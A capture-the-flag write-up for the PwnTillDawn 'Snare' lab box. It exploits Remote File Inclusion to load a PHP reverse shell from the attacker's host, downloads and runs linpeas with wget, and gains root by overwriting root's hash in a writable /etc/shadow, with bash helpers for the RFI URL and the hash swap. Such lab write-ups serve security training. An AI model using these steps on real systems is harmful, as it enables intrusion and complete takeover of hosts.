Snare | 10.150.150.18 | PwnTillDawn
We will take a look at Snare (10.150.150.18) machine in PwnTillDawn.
Enumeration
We will begin with a full-port Nmap scan with default scripts and version detection:

```bash
sudo nmap -v -p- -sC -sV 10.150.150.18 --open

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 2f:0e:73:d4:ae:73:14:7e:c5:1c:15:84:ef:45:a4:d1 (RSA)
|   256 39:0b:0b:c9:86:c9:8e:b5:2b:0c:39:c7:63:ec:e2:10 (ECDSA)
|_  256 f6:bf:c5:03:5b:df:e5:e1:f4:da:ac:1e:b2:07:88:2f (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
| http-title: Welcome to my homepage!
|_Requested resource was /index.php?page=home
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Only ports 22 (SSH) and 80 (HTTP) are open, and Nmap already tells us the landing page is /index.php?page=home.
We will fire up our web browser and visit 10.150.150.18.

Observing the web application, the page query parameter changes as we navigate between Home, About Us and Contact (index.php?page=home, and so on). A parameter that selects which file the server renders is the classic sign of a file inclusion bug, so we test it for Remote File Inclusion.

To test for RFI, start a Python HTTP server on our attacking machine (10.66.66.254):

```bash
python3 -m http.server 80
```

Then point the page parameter at our own server:

```
http://10.150.150.18/index.php?page=http://10.66.66.254/
```

Our Python server logs a request from the target, which confirms RFI: the application passes the page value straight into an include of a remote URL. Note the path the target asked for: it tacked .php onto our bare URL, so the include is effectively page + ".php". This matters for the next step, because the file we host must carry a .php extension while the value we put in the URL must leave it off.
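To make that reasoning repeatable, here is a small shell helper, added as an example and not part of the original writeup: it parses the access-log line that python3 -m http.server prints, extracts the suffix the application appended, and builds the filename to host and the trigger URL to send. The log line is constructed to mirror what the probe above produces; the function names are my own.

```bash
#!/usr/bin/env bash
# Added example, not from the original writeup. Works out the include rule
# from the access-log line python3 -m http.server printed when the target
# fetched ?page=http://ATTACKER/ and builds the matching trigger URL.

# rfi_requested_path LOGLINE: the path the target asked our server for.
rfi_requested_path() {
    printf '%s\n' "$1" | sed -nE 's/^.*"GET ([^ ]*) HTTP\/[0-9.]+".*$/\1/p'
}

# rfi_suffix LOGLINE: what the application appended to our bare URL
# (".php" here, i.e. it does include($page . ".php")); empty if nothing.
rfi_suffix() {
    local path
    path=$(rfi_requested_path "$1")
    printf '%s\n' "${path#/}"
}

# rfi_hosted_file NAME SUFFIX: filename to serve so the appended suffix
# lines up with a file that actually exists on our server.
rfi_hosted_file() {
    printf '%s%s\n' "$1" "$2"
}

# rfi_trigger_url TARGET ATTACKER NAME: the page value to send is NAME
# without the suffix, because the application adds it for us.
rfi_trigger_url() {
    printf 'http://%s/index.php?page=http://%s/%s\n' "$1" "$2" "$3"
}

# Constructed sample of the python http.server log line from the probe.
SAMPLE_LOG='10.150.150.18 - - [01/Jan/2024 12:00:00] "GET /.php HTTP/1.1" 404 -'

# Usage: derive the suffix, then host webshell.php and request ...=/webshell
suffix=$(rfi_suffix "$SAMPLE_LOG")
echo "host as: $(rfi_hosted_file webshell "$suffix")"
echo "send:    $(rfi_trigger_url 10.150.150.18 10.66.66.254 webshell)"
```

If the target had requested / with nothing appended, rfi_suffix would be empty and the name in the URL would have to include the extension itself; the helper handles both cases.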
Exploitation
Since the application's backend is PHP, we grab a PHP reverse shell from revshells: enter our IP address and port number and select the PHP Ivan Sincek option. Copy the payload to our machine and save it as webshell.php in the directory the Python server is serving. Because the application appends .php itself, the name we will put in the URL is webshell, without the extension.

Open a netcat listener with rlwrap on port 8080:

```bash
rlwrap nc -nlvp 8080
```

Now send the request that makes the target include our file:

```
http://10.150.150.18/index.php?page=http://10.66.66.254/webshell
```

The reverse shell lands in our netcat listener.

Privilege Escalation
First, upgrade the shell to a proper PTY:

```bash
python3 -c "import pty; pty.spawn('/bin/bash')"
```

Next, transfer the linpeas.sh script from our Kali machine to the target. On Kali, start a Python server in the folder containing linpeas.sh:

```bash
python3 -m http.server 80
```

On the target, change to /tmp (world-writable, so the download will succeed regardless of which user we landed as) and pull the script down with wget:

```bash
wget 10.66.66.254/linpeas.sh
```

Once it is downloaded, make it executable and run it:

```bash
chmod +x linpeas.sh
./linpeas.sh
```

Linpeas highlights that /etc/shadow is writable by our user, which gives us a direct route to root.

The idea is to generate a hash for a password we know and swap it in for root's current hash in /etc/shadow. On our Kali machine:

```bash
mkpasswd -m sha-512 'P@ssword123!'
$6$lJD6ylm1R6Uzk72q$E26NRy.uptSZV0EF6VhFRqb8pdM3t2ezNNHZ77Dk4p/oQQg3O9dYsee11L7E5BrkotLmN0Z3iFAOW03Aj3wlF0
```

(mkpasswd ships in the whois package; openssl passwd -6 'P@ssword123!' produces an equivalent SHA-512 crypt hash if it is not installed.)

Each /etc/shadow line is colon-separated and the hash is the second field, so we need to replace everything between the first and second colon on the root line. On the target:

```bash
NEW_HASH='$6$lJD6ylm1R6Uzk72q$E26NRy.uptSZV0EF6VhFRqb8pdM3t2ezNNHZ77Dk4p/oQQg3O9dYsee11L7E5BrkotLmN0Z3iFAOW03Aj3wlF0'
sed -E "s|^(root:)[^:]*:|\1${NEW_HASH}:|" /etc/shadow
```

Without -i, sed only prints the modified file to stdout, which is a safe preview. The regex works as follows:
- ^(root:) matches only the root line and captures the username field
- [^:]* consumes field 2 (anything that is not a colon), i.e. the old hash
- the following : stops the match exactly at the end of field 2

We use | as the s delimiter because the hash contains /, which would otherwise terminate the pattern. The single quotes around NEW_HASH stop the shell from expanding the $6$ and $salt$ parts as variables; inside a sed replacement $ is literal, so the hash survives intact.

Writing it back (without sed -i)

Linpeas reported the file /etc/shadow as writable, but that says nothing about the /etc directory. sed -i works by writing a temporary file and renaming it over the original, which needs write permission on the directory, so it can fail here even though the file is ours to edit. Instead we overwrite the contents of the existing file, which only needs write permission on the file itself:

```bash
sed -E "s|^(root:)[^:]*:|\1${NEW_HASH}:|" /etc/shadow > /tmp/shadow.new
cat /tmp/shadow.new > /etc/shadow
```

With root's hash replaced, switch to root and enter P@ssword123! at the password prompt:

```bash
su root
```
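The same replacement wrapped in a small shell function, added here as an example rather than taken from the original writeup: it refuses anything that is not a SHA-512 crypt string, keeps a backup copy so the line can be restored after the engagement, overwrites the file in place instead of renaming, and reads the root field back so the change is confirmed before running su. The function names, the BACKUP_DIR variable and the sample shadow contents used in the test are constructed, not taken from the target.

```bash
#!/usr/bin/env bash
# Added example, not from the original writeup. Replaces root's hash (field 2)
# in a shadow-format file by overwriting the existing file, which only needs
# write permission on the file itself; sed -i would create a new file and
# rename it into place, which additionally needs write permission on /etc.

# root_hash FILE: print the current second field of the root line.
root_hash() {
    awk -F: '$1 == "root" { print $2; exit }' "$1"
}

# set_root_hash FILE HASH: swap in HASH for root, keeping a backup copy in
# BACKUP_DIR (constructed variable, defaults to /tmp). Returns non-zero and
# leaves FILE untouched if HASH is not a $6$ (SHA-512 crypt) string.
set_root_hash() {
    local shadow=$1 hash=$2 backup tmp
    case $hash in
        '$6$'*) ;;
        *) echo "refusing: not a sha-512 crypt hash" >&2; return 1 ;;
    esac
    # Keep the original so the line can be restored later.
    backup="${BACKUP_DIR:-/tmp}/$(basename "$shadow").bak"
    cp "$shadow" "$backup" || return 1
    tmp=$(mktemp) || return 1
    # '|' as the s delimiter because crypt hashes contain '/'. ${hash} expands
    # inside the shell's double quotes; sed treats '$' literally in the
    # replacement, so the $6$salt$ prefix survives intact.
    if ! sed -E "s|^(root:)[^:]*:|\1${hash}:|" "$shadow" > "$tmp"; then
        rm -f "$tmp"
        return 1
    fi
    # Overwrite the existing inode instead of renaming a new file over it.
    cat "$tmp" > "$shadow"
    rm -f "$tmp"
    # Confirm the write actually landed before trusting it.
    [ "$(root_hash "$shadow")" = "$hash" ]
}

# Usage on the target (the hash is the one generated with mkpasswd above):
# set_root_hash /etc/shadow '$6$lJD6ylm1R6Uzk72q$E26NRy...Aj3wlF0' && su root
```

The final comparison is the check worth keeping even when typing this by hand: if the cat redirection silently fails (for example because the file is only group-writable and the shell is not running as that group), su will simply reject the password and it is not obvious why.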

Snare is rooted. Thanks for reading!